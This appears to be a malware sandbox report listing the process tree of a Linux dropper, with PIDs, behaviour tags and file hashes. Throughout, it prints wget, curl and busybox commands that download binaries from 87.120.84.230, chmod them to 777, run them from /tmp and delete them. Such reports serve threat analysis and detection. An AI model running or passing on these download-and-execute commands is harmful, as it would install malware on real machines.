/usr/bin/wgetwget http://87.120.84.230/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:944
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:946
-
-
/bin/chmodchmod 777 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0./dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:949
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:950
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:952
-
-
/bin/chmodchmod 777 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ./cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:955
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:956
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:958
-
-
/bin/chmodchmod 777 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K./mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:961
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:962
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:964
-
-
/bin/chmodchmod 777 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE./cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:967
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:968
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:970
-
-
/bin/chmodchmod 777 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce./LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:973
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:974
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:976
-
-
/bin/chmodchmod 777 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- File and Directory Permissions Modification
PID:977
-
-
/tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl./ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- Executes dropped EXE
PID:978
-
-
/bin/rmrm ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:979
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:980
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:981
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:982
-
-
/bin/chmodchmod 777 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8./4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:985
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
176B
MD5e1732e70f015e99d14dff1eeeaec9966
SHA1c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA2566de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA5126ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97